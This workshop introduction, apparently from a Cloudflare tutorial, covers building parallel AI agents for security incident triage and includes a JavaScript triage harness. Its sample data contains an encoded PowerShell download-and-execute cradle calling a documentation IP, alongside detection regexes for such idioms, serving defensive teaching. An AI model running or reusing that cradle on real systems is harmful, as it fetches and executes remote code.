What does a SIRT team do?
A Security Incident Response Team (SIRT) is the group of analysts responsible for detecting, triaging, investigating, and responding to security incidents across an organization. When an alert fires — malware detected on a workstation, a phishing email reported, suspicious login activity from an unusual country, or data leaving the network in unexpected volumes — SIRT is on the clock.
Their job is to answer three questions as fast as possible:
- Is this real? — Distinguish true positives from noise.
- How bad is it? — Determine scope, severity, and blast radius.
- What do we do? — Recommend containment, remediation, and escalation steps.
Every minute matters. A delayed triage can mean the difference between isolating a compromised host and watching an attacker pivot laterally across the network.
The problem: manual triage is slow
Today, most SIRT workflows look like this:
| Step | What the analyst does | Time |
|---|---|---|
| 1. Read the alert | Open the SIEM, read raw log data | 3–5 min |
| 2. Pivot to identity tools | Look up the user in Active Directory, check MFA status | 5–8 min |
| 3. Check network reputation | Query VirusTotal, AbuseIPDB, or internal threat intel feeds | 5–10 min |
| 4. Analyze command-line activity | Review EDR telemetry for suspicious processes | 5–10 min |
| 5. Correlate across sources | Mentally stitch together findings from 4+ tools | 5–10 min |
| 6. Write the triage card | Summarize findings, assign severity, recommend actions | 5–10 min |
| Total | | ~30–60 min |
That’s 30–60 minutes per incident, with constant context-switching between tools. Analysts handle dozens of alerts per shift. Fatigue leads to missed signals. Burnout is real.
The agentic solution: parallel AI analysis
What if you could throw the incident at a team of specialized AI agents that work in parallel — each one analyzing a different dimension of the incident — and synthesize the results into a triage card in under 60 seconds?
That’s what you’ll build in this workshop.
Before (manual):
- One analyst, working serially across 4+ tools
- ~45 minutes per incident
- High cognitive load, easy to miss correlations
After (agentic):
- A Coordinator agent dispatches 4 specialist sub-agents in parallel
- A Triage Synthesizer combines their findings into a structured triage card
- A Response Agent generates a concrete action plan
- ~60 seconds end-to-end
Manual vs Agentic Triage
```mermaid
flowchart LR
  subgraph manual["Manual — ~45 min (serial)"]
    direction LR
    A1[Analyst] --> A2[EDR]
    A2 --> A3[SIEM]
    A3 --> A4[Threat Intel]
    A4 --> A5[DNS/WHOIS]
    A5 --> A6[Write Report]
  end
  subgraph agentic["Agentic — <60s (parallel)"]
    direction LR
    B1[Incident] --> B2[Coordinator]
    B2 --> B3[Cmd-Line]
    B2 --> B4[Identity]
    B2 --> B5[Network]
    B2 --> B6[Activity]
    B3 --> B7[Synthesizer]
    B4 --> B7
    B5 --> B7
    B6 --> B7
    B7 --> B8[Action Plan]
  end
```
The four incident scenarios
Throughout this workshop, you’ll work with four realistic incident scenarios seeded into your database:
- Malware + Command & Control — A workstation running encoded PowerShell commands and beaconing to a known C2 IP address.
- Phishing + Business Email Compromise — A user clicked a credential-harvesting link and their mailbox is now forwarding to an external address.
- Anomalous Authentication — A service account authenticating from three countries within 10 minutes, an impossible-travel pattern.
- Data Exfiltration — Large volumes of data uploaded to an unapproved cloud storage provider outside business hours.
Each scenario exercises different analytical dimensions and will be analyzed by different combinations of sub-agents.
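To make the coordinator / specialist / synthesizer shape concrete, here is an added, stand-alone example of the fan-out pattern run over the first scenario above. It is not the workshop's Agents SDK code and makes no LLM calls: the four specialists are deterministic heuristics standing in for the sub-agents, and the incident records, the C2 blocklist and the user directory are constructed sample data. The field names (`commandLine`, `destinations`, `bytesOut`) and the score thresholds are assumptions made for the demo.

```javascript
// Added example: fan-out / synthesize triage harness (not the workshop's code).
// Specialists are heuristics standing in for LLM-backed sub-agents; all data is constructed.

// Constructed threat-intel and identity data (assumptions for the demo).
const KNOWN_C2_IPS = new Set(["203.0.113.57"]);          // TEST-NET-3 documentation address
const USER_DIRECTORY = {
  "svc-backup": { mfa: false, privileged: true },
  "jdoe":       { mfa: true,  privileged: false },
};

// PowerShell -EncodedCommand is base64 over UTF-16LE; encode/decode without Buffer
// so the same code runs under Node and in a Worker.
function encodeCommand(text) {
  let bytes = "";
  for (let i = 0; i < text.length; i++) {
    const c = text.charCodeAt(i);
    bytes += String.fromCharCode(c & 0xff, c >> 8);
  }
  return btoa(bytes);
}
function decodeEncodedCommand(b64) {
  const bytes = atob(b64);
  let out = "";
  for (let i = 0; i + 1 < bytes.length; i += 2) {
    out += String.fromCharCode(bytes.charCodeAt(i) | (bytes.charCodeAt(i + 1) << 8));
  }
  return out;
}

// Specialist 1: command-line. Decodes -enc payloads and flags download-and-execute idioms.
async function analyzeCommandLine(incident) {
  const findings = [];
  const m = /-(?:e|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)/i.exec(incident.commandLine ?? "");
  if (m) {
    const decoded = decodeEncodedCommand(m[1]);
    findings.push({ score: 3, note: `encoded PowerShell decodes to: ${decoded}` });
    if (/downloadstring|invoke-webrequest|\biex\b/i.test(decoded)) {
      findings.push({ score: 2, note: "decoded command fetches and executes remote content" });
    }
  }
  return { dimension: "command-line", findings };
}

// Specialist 2: identity. Looks the user up in the (constructed) directory.
async function analyzeIdentity(incident) {
  const user = USER_DIRECTORY[incident.user] ?? { mfa: false, privileged: false };
  const findings = [];
  if (!user.mfa) findings.push({ score: 1, note: `${incident.user} has no MFA enrolled` });
  if (user.privileged) findings.push({ score: 2, note: `${incident.user} is a privileged account` });
  return { dimension: "identity", findings };
}

// Specialist 3: network. Checks destinations against the (constructed) C2 list.
async function analyzeNetwork(incident) {
  const findings = [];
  for (const ip of incident.destinations ?? []) {
    if (KNOWN_C2_IPS.has(ip)) findings.push({ score: 4, note: `${ip} is a known C2 address` });
  }
  return { dimension: "network", findings };
}

// Specialist 4: activity. Off-hours timing and outbound volume.
async function analyzeActivity(incident) {
  const findings = [];
  const hour = new Date(incident.timestamp).getUTCHours();
  if (hour < 6 || hour >= 20) findings.push({ score: 1, note: "activity outside business hours (UTC)" });
  if ((incident.bytesOut ?? 0) > 500 * 1024 * 1024) findings.push({ score: 2, note: "large outbound transfer" });
  return { dimension: "activity", findings };
}

// Coordinator + synthesizer: dispatch all four specialists concurrently, then
// fold their findings into one triage card with an assumed severity scale.
async function triage(incident) {
  const reports = await Promise.all([
    analyzeCommandLine(incident), analyzeIdentity(incident),
    analyzeNetwork(incident),     analyzeActivity(incident),
  ]);
  const score = reports.flatMap(r => r.findings).reduce((s, f) => s + f.score, 0);
  const severity = score >= 8 ? "critical" : score >= 5 ? "high" : score >= 2 ? "medium" : "low";
  const dimensionsFlagged = reports.filter(r => r.findings.length > 0).map(r => r.dimension);
  return { id: incident.id, severity, score, dimensionsFlagged, reports };
}

// Constructed incidents: scenario 1 (malware + C2) and a benign control.
const SAMPLE_C2_INCIDENT = {
  id: "INC-0001", user: "svc-backup", timestamp: "2024-05-04T02:17:00Z",
  commandLine: `powershell.exe -nop -w hidden -enc ${encodeCommand(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.57/a')")}`,
  destinations: ["203.0.113.57"], bytesOut: 12 * 1024,
};
const SAMPLE_BENIGN_INCIDENT = {
  id: "INC-0002", user: "jdoe", timestamp: "2024-05-04T14:05:00Z",
  commandLine: "notepad.exe", destinations: ["198.51.100.10"], bytesOut: 0,
};

triage(SAMPLE_C2_INCIDENT).then(card => console.log(JSON.stringify(card, null, 2)));
```

The point to take from it is structural: each specialist sees only its own dimension and returns scored findings, the coordinator is the only place that knows all four exist, and the synthesizer never re-analyzes raw telemetry, it only aggregates. That is the same split the workshop's Coordinator, sub-agents and Triage Synthesizer use, with the heuristics swapped for Workers AI calls.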
What you’ll build with — the Cloudflare primitives
Each lesson introduces one Cloudflare building block. Here’s a preview:
| Primitive | What it does in this workshop |
|---|---|
| Workers | Hosts your analyst console app at the edge — both the UI and the API |
| D1 | Stores the incident queue in a serverless SQL database accessed via binding |
| Durable Objects | Gives each incident its own persistent stateful session that survives reloads |
| Workers AI | Runs LLM inference at the edge for analyzing incident telemetry |
| Agents SDK | Orchestrates the multi-agent harness — coordinator, sub-agents, and synthesis |
| Sandbox SDK | Executes CLI commands (network lookups, hash checks) in an isolated sandbox |
| Dynamic Workers | Generates and deploys custom Worker code at runtime for automated response |
You don’t need to know any of these in advance. Each lesson introduces one primitive with hands-on exercises.